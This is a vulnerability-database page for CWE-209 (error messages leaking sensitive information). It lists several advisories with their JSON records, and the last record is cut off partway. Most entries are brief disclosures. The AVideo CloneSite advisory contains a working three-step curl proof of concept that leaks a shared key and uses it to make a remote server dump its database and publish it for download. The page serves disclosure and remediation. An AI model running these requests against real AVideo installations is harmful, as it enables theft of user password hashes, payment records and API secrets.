Common Weakness Enumeration

CWE-209

Allowed

Generation of Error Message Containing Sensitive Information

Abstraction: Base · Status: Draft

The product generates an error message that includes sensitive information about its environment, users, or associated data.

833 vulnerabilities reference this CWE, most recent first.

GHSA-Q7CQ-6X2W-XG5F

Vulnerability from github – Published: 2022-05-24 17:38 – Updated: 2022-05-24 17:38
VLAI
Details

IBM Emptoris Contract Management and IBM Emptoris Spend Analysis 10.1.0, 10.1.1, and 10.1.3 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 190988.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2020-4897"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-209"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-01-07T18:15:00Z",
    "severity": "MODERATE"
  },
  "details": "IBM Emptoris Contract Management and IBM Emptoris Spend Analysis 10.1.0, 10.1.1, and 10.1.3 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 190988.",
  "id": "GHSA-q7cq-6x2w-xg5f",
  "modified": "2022-05-24T17:38:14Z",
  "published": "2022-05-24T17:38:14Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-4897"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/190988"
    },
    {
      "type": "WEB",
      "url": "https://www.ibm.com/support/pages/node/6398276"
    },
    {
      "type": "WEB",
      "url": "https://www.ibm.com/support/pages/node/6398280"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-Q97C-VHWV-V5W3

Vulnerability from github – Published: 2024-09-25 03:30 – Updated: 2026-04-08 18:33
VLAI
Details

The Community by PeepSo – Social Network, Membership, Registration, User Profiles plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 6.4.6.0. This is due to the plugin displaying errors and allowing direct access to the sse.php file. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-7426"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-200",
      "CWE-209"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-09-25T03:15:03Z",
    "severity": "MODERATE"
  },
  "details": "The Community by PeepSo \u2013 Social Network, Membership, Registration, User Profiles plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 6.4.6.0. This is due to the plugin displaying errors and allowing direct access to the sse.php file. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.",
  "id": "GHSA-q97c-vhwv-v5w3",
  "modified": "2026-04-08T18:33:36Z",
  "published": "2024-09-25T03:30:36Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-7426"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/browser/peepso-core/tags/6.4.6.1/sse.php?rev=3157925"
    },
    {
      "type": "WEB",
      "url": "https://wordpress.org/plugins/peepso-core/#developers"
    },
    {
      "type": "WEB",
      "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2e69d666-50de-4c82-9ad4-9ed40fcc7218?source=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-Q9XM-V767-X65C

Vulnerability from github – Published: 2022-05-24 17:19 – Updated: 2024-04-04 02:54
VLAI
Details

Inappropriate implementation in accessibility in Google Chrome prior to 74.0.3729.108 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2020-6503"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-200",
      "CWE-209"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2020-06-03T23:15:00Z",
    "severity": "MODERATE"
  },
  "details": "Inappropriate implementation in accessibility in Google Chrome prior to 74.0.3729.108 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page.",
  "id": "GHSA-q9xm-v767-x65c",
  "modified": "2024-04-04T02:54:18Z",
  "published": "2022-05-24T17:19:24Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-6503"
    },
    {
      "type": "WEB",
      "url": "https://chromereleases.googleblog.com/2019/04/stable-channel-update-for-desktop_23.html"
    },
    {
      "type": "WEB",
      "url": "https://crbug.com/639322"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-QCR8-X557-7CP3

Vulnerability from github – Published: 2026-07-02 19:03 – Updated: 2026-07-02 19:03
VLAI
Summary
@asymmetric-effort/specifyjs: Production console warnings may leak internal framework state
Details

Finding

Location: core/src/core/scheduler.ts:23, core/src/hooks/dispatcher.ts:100, core/src/client/graphql.ts:71

Several console.warn calls are not gated behind __DEV__ and will fire in production builds, potentially exposing internal framework state such as queue sizes, component names, and query fragments to users viewing the browser console.

Status

Open — These warnings serve as development-time diagnostics. They do not expose credentials or PII, but may reveal internal architecture details.

Recommendation

Gate all development-time console.warn and console.error calls behind process.env.NODE_ENV !== 'production' or a __DEV__ constant that build tools can tree-shake.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.2.137"
      },
      "package": {
        "ecosystem": "npm",
        "name": "@asymmetric-effort/specifyjs"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.2.140"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-209"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-07-02T19:03:10Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "## Finding\n\n**Location**: `core/src/core/scheduler.ts:23`, `core/src/hooks/dispatcher.ts:100`, `core/src/client/graphql.ts:71`\n\nSeveral `console.warn` calls are not gated behind `__DEV__` and will fire in production builds, potentially exposing internal framework state such as queue sizes, component names, and query fragments to users viewing the browser console.\n\n## Status\n\n**Open** \u2014 These warnings serve as development-time diagnostics. They do not expose credentials or PII, but may reveal internal architecture details.\n\n## Recommendation\n\nGate all development-time `console.warn` and `console.error` calls behind `process.env.NODE_ENV !== \u0027production\u0027` or a `__DEV__` constant that build tools can tree-shake.",
  "id": "GHSA-qcr8-x557-7cp3",
  "modified": "2026-07-02T19:03:11Z",
  "published": "2026-07-02T19:03:10Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/asymmetric-effort/specifyjs/security/advisories/GHSA-qcr8-x557-7cp3"
    },
    {
      "type": "WEB",
      "url": "https://github.com/asymmetric-effort/specifyjs/commit/2ef791bc73ead853efd0c227ad8228bc594a7b63"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/asymmetric-effort/specifyjs"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "@asymmetric-effort/specifyjs: Production console warnings may leak internal framework state"
}

GHSA-QG6G-CX48-8J37

Vulnerability from github – Published: 2025-01-21 06:30 – Updated: 2025-01-21 06:30
VLAI
Details

The 1003 Mortgage Application plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 1.87. This is due the /inc/class/fnm/export.php file being publicly accessible with error logging enabled. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-13536"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-209"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-01-21T05:15:07Z",
    "severity": "MODERATE"
  },
  "details": "The 1003 Mortgage Application plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 1.87. This is due the /inc/class/fnm/export.php file being publicly accessible with error logging enabled. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.",
  "id": "GHSA-qg6g-cx48-8j37",
  "modified": "2025-01-21T06:30:45Z",
  "published": "2025-01-21T06:30:45Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-13536"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/browser/1003-mortgage-application/trunk/inc/class/fnm/export.php"
    },
    {
      "type": "WEB",
      "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/cfbc90b9-af91-49ac-ad3d-a37c17e8ba6d?source=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-QH32-C3PP-X33G

Vulnerability from github – Published: 2022-05-24 19:19 – Updated: 2022-05-24 19:19
VLAI
Details

A vulnerability in the web-based dashboard of Cisco Umbrella could allow an authenticated, remote attacker to perform an email enumeration attack against the Umbrella infrastructure. This vulnerability is due to an overly descriptive error message on the dashboard that appears when a user attempts to modify their email address when the new address already exists in the system. An attacker could exploit this vulnerability by attempting to modify the user's email address. A successful exploit could allow the attacker to enumerate email addresses of users in the system.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-40126"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-209"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-11-04T16:15:00Z",
    "severity": "MODERATE"
  },
  "details": "A vulnerability in the web-based dashboard of Cisco Umbrella could allow an authenticated, remote attacker to perform an email enumeration attack against the Umbrella infrastructure. This vulnerability is due to an overly descriptive error message on the dashboard that appears when a user attempts to modify their email address when the new address already exists in the system. An attacker could exploit this vulnerability by attempting to modify the user\u0027s email address. A successful exploit could allow the attacker to enumerate email addresses of users in the system.",
  "id": "GHSA-qh32-c3pp-x33g",
  "modified": "2022-05-24T19:19:45Z",
  "published": "2022-05-24T19:19:45Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-40126"
    },
    {
      "type": "WEB",
      "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-umbrella-user-enum-S7XfJwDE"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-QH5X-8Q5J-WHHF

Vulnerability from github – Published: 2026-01-23 21:30 – Updated: 2026-01-26 18:31
VLAI
Details

A vulnerability in the PHP backend of gemsloyalty.aptsys.com.sg thru 2025-05-28 allows unauthenticated remote attackers to trigger detailed error messages that disclose internal file paths, code snippets, and stack traces. This occurs when specially crafted HTTP GET/POST requests are sent to public API endpoints, exposing potentially sensitive information useful for further exploitation. This issue is classified under CWE-209: Information Exposure Through an Error Message.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-52022"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-209"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-01-23T21:15:49Z",
    "severity": "MODERATE"
  },
  "details": "A vulnerability in the PHP backend of gemsloyalty.aptsys.com.sg thru 2025-05-28 allows unauthenticated remote attackers to trigger detailed error messages that disclose internal file paths, code snippets, and stack traces. This occurs when specially crafted HTTP GET/POST requests are sent to public API endpoints, exposing potentially sensitive information useful for further exploitation. This issue is classified under CWE-209: Information Exposure Through an Error Message.",
  "id": "GHSA-qh5x-8q5j-whhf",
  "modified": "2026-01-26T18:31:29Z",
  "published": "2026-01-23T21:30:43Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-52022"
    },
    {
      "type": "WEB",
      "url": "https://gist.github.com/ReverseThatApp/4a6be2b9b2ba39d38c35c8753e0afd39"
    },
    {
      "type": "WEB",
      "url": "http://aptsys.com"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-QHM5-6Q48-XXP4

Vulnerability from github – Published: 2023-04-25 18:30 – Updated: 2024-04-04 03:40
VLAI
Details

No exception handling vulnerability which revealed sensitive or excessive information to users.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-23837"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-209",
      "CWE-755"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-04-25T18:15:09Z",
    "severity": "HIGH"
  },
  "details": "No exception handling vulnerability which revealed sensitive or excessive information to users.",
  "id": "GHSA-qhm5-6q48-xxp4",
  "modified": "2024-04-04T03:40:47Z",
  "published": "2023-04-25T18:30:23Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-23837"
    },
    {
      "type": "WEB",
      "url": "https://documentation.solarwinds.com/en/success_center/dpa/content/release_notes/dpa_2023-2_release_notes.htm"
    },
    {
      "type": "WEB",
      "url": "https://www.solarwinds.com/trust-center/security-advisories/cve-2023-23837"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-QJP6-CP7G-V8XV

Vulnerability from github – Published: 2025-01-25 15:30 – Updated: 2025-08-13 18:31
VLAI
Details

IBM Cloud Pak System 2.3.3.0, 2.3.3.3, 2.3.3.3 iFix1, 2.3.3.4, 2.3.3.5, 2.3.3.6, 2.3.3.6 iFix1, 2.3.3.6 iFix2, 2.3.3.7, and 2.3.3.7 iFix1 could disclose sensitive information about the system that could aid in further attacks against the system.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-38714"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-209"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-01-25T14:15:28Z",
    "severity": "MODERATE"
  },
  "details": "IBM Cloud Pak System 2.3.3.0, 2.3.3.3, 2.3.3.3 iFix1, 2.3.3.4, 2.3.3.5, 2.3.3.6, 2.3.3.6 iFix1, 2.3.3.6 iFix2, 2.3.3.7, and 2.3.3.7 iFix1\u00a0could disclose sensitive information about the system that could aid in further attacks against the system.",
  "id": "GHSA-qjp6-cp7g-v8xv",
  "modified": "2025-08-13T18:31:11Z",
  "published": "2025-01-25T15:30:31Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-38714"
    },
    {
      "type": "WEB",
      "url": "https://www.ibm.com/support/pages/node/7159533"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-QM9P-P5PW-JRX2

Vulnerability from github – Published: 2026-05-05 18:58 – Updated: 2026-05-13 14:19
VLAI
Summary
AVideo: Unauthenticated Disclosure of CloneSite `myKey` via Error Echo in `cloneClient.json.php` Enables Cross-Site DB Dump of the Configured Clone Server
Details

Summary

plugin/CloneSite/cloneClient.json.php echoes the local CloneSite shared secret ($objClone->myKey, a constant md5($global['systemRootPath'] . $global['salt'])) into the HTTP response body on every unauthenticated request. The unauthenticated error branch was intended to reject non-admin callers without a valid key, but the rejection message interpolates the expected key before die(). When the victim has CloneSite configured with a remote cloneSiteURL (standard federation/backup setup), the leaked myKey is exactly the credential that authenticates the victim to that remote server's cloneServer.json.php, allowing the attacker to impersonate the victim and trigger a full mysqldump of the remote's database to the remote's public videos/clones/ directory.

Details

1. The leak (plugin/CloneSite/cloneClient.json.php:51-60)

$objCloneOriginal = $objClone;
$argv[1] = preg_replace("/[^A-Za-z0-9 ]/", '', empty($argv[1])?'':$argv[1]);

if (empty($objClone) || empty($argv[1]) || $objClone->myKey !== $argv[1]) {
    if (!User::isAdmin()) {
        $resp->msg = "You can't do this";
        $log->add("Clone: {$resp->msg}");
        echo "$objClone->myKey !== $argv[1]";   // <-- interpolates myKey
        die(json_encode($resp));
    }
}

Under PHP's web SAPI, the script-scope $argv global is not populated from the query string (only $_SERVER['argv'] is populated, and only when register_argc_argv=On). Verified on this host (PHP 8.4.16, built-in web server):

bool(false)                # isset($argv)
string(9) "undefined"      # $argv ?? 'undefined'
string(9) "undefined"      # $_SERVER['argv']
string(9) "undefined"      # $argv[1]
bool(true)                 # empty($argv[1])

Because empty($argv[1]) is true, line 51's preg_replace returns '' and $argv[1] becomes ''. Line 53 therefore enters the outer if (empty key). User::isAdmin() returns false for unauthenticated callers, so line 57 runs and echoes the contents of $objClone->myKey into the response body before die(). The response body looks like:

<32-hex-char md5> !== {"error":true,"msg":"You can't do this"}

The 32-hex prefix is the local myKey.

2. Where myKey comes from (plugin/CloneSite/CloneSite.php:67)

$obj->myKey = md5($global['systemRootPath'].$global['salt']);

myKey is a static per-installation value generated from systemRootPath and salt. It never rotates.

3. Why the leaked key is dangerous (cross-site chain)

cloneClient.json.php:75 shows myKey is the credential the client presents to its configured remote clone server:

$url = $objClone->cloneSiteURL . "plugin/CloneSite/cloneServer.json.php?url="
     . urlencode($global['webSiteRootURL']) . "&key={$objClone->myKey}&useRsync=" . intval($objClone->useRsync);

On the remote side, plugin/CloneSite/cloneServer.json.php:32-42 calls Clones::thisURLCanCloneMe($_GET['url'], $_GET['key']), which in plugin/CloneSite/Objects/Clones.php:73-101 does only:

$clone = new Clones(0);
$clone->loadFromURL($url);
...
if ($clone->getKey() !== $key) { $resp->msg = "Invalid Key"; return $resp; }
if ($clone->getStatus() !== 'a') { ... }

For any federation pair the remote admin has approved (status='a'), supplying url=<victim>&key=<leaked myKey> passes this check. cloneServer.json.php:86-90 then runs an unconditional mysqldump of every table except CachesInDB:

$cmd = "mysqldump -u {$mysqlUser} -p'{$mysqlPass}' --host {$mysqlHost} ".
       " --default-character-set=utf8mb4 {$mysqlDatabase} {$tablesList} > $sqlFile";
exec($cmd . " 2>&1", $output, $return_val);
...
echo json_encode($resp);   // includes $resp->sqlFile = "Clone_mysqlDump_<uniqid>.sql"

The dump lands in {videosDir}/clones/<sqlFile>, and videos/ is a public static directory in default AVideo deployments, so the attacker can fetch it with one more unauthenticated request.

4. Not fixed by the previous clones.json.php hardening

Commit 160e02635/earlier added if (!User::isAdmin()) guards to plugin/CloneSite/clones.json.php (the table-management endpoint that lists server-side per-client keys, previously advisory-submitted as CWE-306). That fix does not apply to cloneClient.json.php, which is a separate file and discloses a structurally different secret (the local myKey, not the per-URL server-side keys).

PoC

Prerequisite: target installation has the CloneSite plugin enabled with a configured cloneSiteURL (this is the standard use: federated backup / site cloning). No authentication required.

Step 1 — leak the local myKey (unauthenticated GET):

curl -s 'https://victim.example.com/plugin/CloneSite/cloneClient.json.php'

Response body:

3f2a7c8b9d6e4f1a0b5c7d8e9f2a3b4c !== {"error":true,"msg":"You can't do this"}

The 32-hex-character prefix is $objClone->myKey.

Step 2 — use the leaked myKey to make the victim's configured remote dump its own database:

curl -s 'https://remote-server.example.com/plugin/CloneSite/cloneServer.json.php?url=https%3A%2F%2Fvictim.example.com%2F&key=3f2a7c8b9d6e4f1a0b5c7d8e9f2a3b4c&useRsync=0'

Response (truncated):

{"error":false,"url":"https://victim.example.com/","key":"...","videosDir":"...","sqlFile":"Clone_mysqlDump_65f3a2b14c7e8.sql","videoFiles":[...],"photoFiles":[...]}

Step 3 — download the full database dump from the remote's public videos/ directory:

curl -O 'https://remote-server.example.com/videos/clones/Clone_mysqlDump_65f3a2b14c7e8.sql'

This file contains every table except CachesInDBusers (including password hashes), payment records, API secrets, plugin configuration, etc.

Impact

  • Any unauthenticated attacker can retrieve the CloneSite shared secret (myKey) of any AVideo installation that has the plugin enabled. myKey is static and never rotates on its own.
  • When that installation is federated with a remote CloneSite server (the standard use of the plugin), the leaked key permits the attacker to impersonate the victim client to the remote. cloneServer.json.php on the remote performs no additional authentication, runs an unconditional mysqldump, and places the result under the web-accessible videos/clones/ directory — so a single leaked myKey leads to a full database dump (users, password hashes, payment and plugin configuration, API credentials) of the remote partner, downloadable over HTTP.
  • The compromise crosses the federation boundary: leaking the key on site A yields the database of site B. This is scope-changing in practice even if CVSS scope is formally Unchanged.
  • The clones.json.php hardening (the previously reported CWE-306 fix) does not cover this path; cloneClient.json.php is a distinct file that exposes a structurally different credential.

Recommended Fix

Do not echo the expected key in the rejection message, and reject non-CLI / non-admin callers cleanly. Example patch for plugin/CloneSite/cloneClient.json.php:51-60:

// Only accept the key argument from actual CLI invocations (intended usage:
// cron "php .../cloneClient.json.php <myKey>"). Over HTTP, require admin.
$cliKey = (PHP_SAPI === 'cli' && !empty($argv[1]))
    ? preg_replace("/[^A-Za-z0-9 ]/", '', $argv[1])
    : '';

if (empty($objClone) || empty($cliKey) || $objClone->myKey !== $cliKey) {
    if (!User::isAdmin()) {
        $resp->msg = "You can't do this";
        $log->add("Clone: {$resp->msg}");
        // Do NOT echo $objClone->myKey — it is a shared secret used to
        // authenticate to the configured remote clone server.
        die(json_encode($resp));
    }
}

Additional hardening recommended:

  • Replace the static myKey = md5(systemRootPath . salt) with a randomly generated, per-installation key stored in the plugin configuration that can be rotated (see similar advice from GHSA-wqcc-qf63-c2x4 / CWE-331 on AVideo secret generation).
  • On the remote side (cloneServer.json.php), consider requiring the sqlFile path to be unguessable (already is, via uniqid()) AND gating the dump behind an IP allowlist or an additional pre-shared rotating token, so that loss of a client's myKey does not immediately yield a full database dump.
  • Serve videos/clones/ with an .htaccess/nginx rule that denies direct HTTP access, so that even if a rogue client is authenticated, the dump is not downloadable over the web.
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "wwbn/avideo"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "29.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-43873"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-209"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-05T18:58:13Z",
    "nvd_published_at": "2026-05-11T22:22:11Z",
    "severity": "HIGH"
  },
  "details": "## Summary\n\n`plugin/CloneSite/cloneClient.json.php` echoes the local CloneSite shared secret (`$objClone-\u003emyKey`, a constant `md5($global[\u0027systemRootPath\u0027] . $global[\u0027salt\u0027])`) into the HTTP response body on every unauthenticated request. The unauthenticated error branch was intended to reject non-admin callers without a valid key, but the rejection message interpolates the expected key before `die()`. When the victim has CloneSite configured with a remote `cloneSiteURL` (standard federation/backup setup), the leaked `myKey` is exactly the credential that authenticates the victim to that remote server\u0027s `cloneServer.json.php`, allowing the attacker to impersonate the victim and trigger a full `mysqldump` of the remote\u0027s database to the remote\u0027s public `videos/clones/` directory.\n\n## Details\n\n### 1. The leak (`plugin/CloneSite/cloneClient.json.php:51-60`)\n\n```php\n$objCloneOriginal = $objClone;\n$argv[1] = preg_replace(\"/[^A-Za-z0-9 ]/\", \u0027\u0027, empty($argv[1])?\u0027\u0027:$argv[1]);\n\nif (empty($objClone) || empty($argv[1]) || $objClone-\u003emyKey !== $argv[1]) {\n    if (!User::isAdmin()) {\n        $resp-\u003emsg = \"You can\u0027t do this\";\n        $log-\u003eadd(\"Clone: {$resp-\u003emsg}\");\n        echo \"$objClone-\u003emyKey !== $argv[1]\";   // \u003c-- interpolates myKey\n        die(json_encode($resp));\n    }\n}\n```\n\nUnder PHP\u0027s web SAPI, the script-scope `$argv` global is not populated from the query string (only `$_SERVER[\u0027argv\u0027]` is populated, and only when `register_argc_argv=On`). Verified on this host (PHP 8.4.16, built-in web server):\n\n```\nbool(false)                # isset($argv)\nstring(9) \"undefined\"      # $argv ?? \u0027undefined\u0027\nstring(9) \"undefined\"      # $_SERVER[\u0027argv\u0027]\nstring(9) \"undefined\"      # $argv[1]\nbool(true)                 # empty($argv[1])\n```\n\nBecause `empty($argv[1])` is true, line 51\u0027s `preg_replace` returns `\u0027\u0027` and `$argv[1]` becomes `\u0027\u0027`. Line 53 therefore enters the outer `if` (empty key). `User::isAdmin()` returns false for unauthenticated callers, so line 57 runs and echoes the contents of `$objClone-\u003emyKey` into the response body before `die()`. The response body looks like:\n\n```\n\u003c32-hex-char md5\u003e !== {\"error\":true,\"msg\":\"You can\u0027t do this\"}\n```\n\nThe 32-hex prefix is the local `myKey`.\n\n### 2. Where `myKey` comes from (`plugin/CloneSite/CloneSite.php:67`)\n\n```php\n$obj-\u003emyKey = md5($global[\u0027systemRootPath\u0027].$global[\u0027salt\u0027]);\n```\n\n`myKey` is a static per-installation value generated from `systemRootPath` and `salt`. It never rotates.\n\n### 3. Why the leaked key is dangerous (cross-site chain)\n\n`cloneClient.json.php:75` shows `myKey` is the credential the client presents to its configured remote clone server:\n\n```php\n$url = $objClone-\u003ecloneSiteURL . \"plugin/CloneSite/cloneServer.json.php?url=\"\n     . urlencode($global[\u0027webSiteRootURL\u0027]) . \"\u0026key={$objClone-\u003emyKey}\u0026useRsync=\" . intval($objClone-\u003euseRsync);\n```\n\nOn the remote side, `plugin/CloneSite/cloneServer.json.php:32-42` calls `Clones::thisURLCanCloneMe($_GET[\u0027url\u0027], $_GET[\u0027key\u0027])`, which in `plugin/CloneSite/Objects/Clones.php:73-101` does only:\n\n```php\n$clone = new Clones(0);\n$clone-\u003eloadFromURL($url);\n...\nif ($clone-\u003egetKey() !== $key) { $resp-\u003emsg = \"Invalid Key\"; return $resp; }\nif ($clone-\u003egetStatus() !== \u0027a\u0027) { ... }\n```\n\nFor any federation pair the remote admin has approved (`status=\u0027a\u0027`), supplying `url=\u003cvictim\u003e\u0026key=\u003cleaked myKey\u003e` passes this check. `cloneServer.json.php:86-90` then runs an unconditional `mysqldump` of every table except `CachesInDB`:\n\n```php\n$cmd = \"mysqldump -u {$mysqlUser} -p\u0027{$mysqlPass}\u0027 --host {$mysqlHost} \".\n       \" --default-character-set=utf8mb4 {$mysqlDatabase} {$tablesList} \u003e $sqlFile\";\nexec($cmd . \" 2\u003e\u00261\", $output, $return_val);\n...\necho json_encode($resp);   // includes $resp-\u003esqlFile = \"Clone_mysqlDump_\u003cuniqid\u003e.sql\"\n```\n\nThe dump lands in `{videosDir}/clones/\u003csqlFile\u003e`, and `videos/` is a public static directory in default AVideo deployments, so the attacker can fetch it with one more unauthenticated request.\n\n### 4. Not fixed by the previous `clones.json.php` hardening\n\nCommit `160e02635`/earlier added `if (!User::isAdmin())` guards to `plugin/CloneSite/clones.json.php` (the table-management endpoint that lists server-side per-client keys, previously advisory-submitted as CWE-306). That fix does not apply to `cloneClient.json.php`, which is a separate file and discloses a structurally different secret (the local `myKey`, not the per-URL server-side keys).\n\n## PoC\n\nPrerequisite: target installation has the `CloneSite` plugin enabled with a configured `cloneSiteURL` (this is the standard use: federated backup / site cloning). No authentication required.\n\n**Step 1 \u2014 leak the local `myKey` (unauthenticated GET):**\n\n```bash\ncurl -s \u0027https://victim.example.com/plugin/CloneSite/cloneClient.json.php\u0027\n```\n\nResponse body:\n\n```\n3f2a7c8b9d6e4f1a0b5c7d8e9f2a3b4c !== {\"error\":true,\"msg\":\"You can\u0027t do this\"}\n```\n\nThe 32-hex-character prefix is `$objClone-\u003emyKey`.\n\n**Step 2 \u2014 use the leaked `myKey` to make the victim\u0027s configured remote dump its own database:**\n\n```bash\ncurl -s \u0027https://remote-server.example.com/plugin/CloneSite/cloneServer.json.php?url=https%3A%2F%2Fvictim.example.com%2F\u0026key=3f2a7c8b9d6e4f1a0b5c7d8e9f2a3b4c\u0026useRsync=0\u0027\n```\n\nResponse (truncated):\n\n```json\n{\"error\":false,\"url\":\"https://victim.example.com/\",\"key\":\"...\",\"videosDir\":\"...\",\"sqlFile\":\"Clone_mysqlDump_65f3a2b14c7e8.sql\",\"videoFiles\":[...],\"photoFiles\":[...]}\n```\n\n**Step 3 \u2014 download the full database dump from the remote\u0027s public `videos/` directory:**\n\n```bash\ncurl -O \u0027https://remote-server.example.com/videos/clones/Clone_mysqlDump_65f3a2b14c7e8.sql\u0027\n```\n\nThis file contains every table except `CachesInDB` \u2014 `users` (including password hashes), payment records, API secrets, plugin configuration, etc.\n\n## Impact\n\n- Any unauthenticated attacker can retrieve the CloneSite shared secret (`myKey`) of any AVideo installation that has the plugin enabled. `myKey` is static and never rotates on its own.\n- When that installation is federated with a remote CloneSite server (the standard use of the plugin), the leaked key permits the attacker to impersonate the victim client to the remote. `cloneServer.json.php` on the remote performs no additional authentication, runs an unconditional `mysqldump`, and places the result under the web-accessible `videos/clones/` directory \u2014 so a single leaked `myKey` leads to a full database dump (users, password hashes, payment and plugin configuration, API credentials) of the remote partner, downloadable over HTTP.\n- The compromise crosses the federation boundary: leaking the key on site A yields the database of site B. This is scope-changing in practice even if CVSS scope is formally `Unchanged`.\n- The 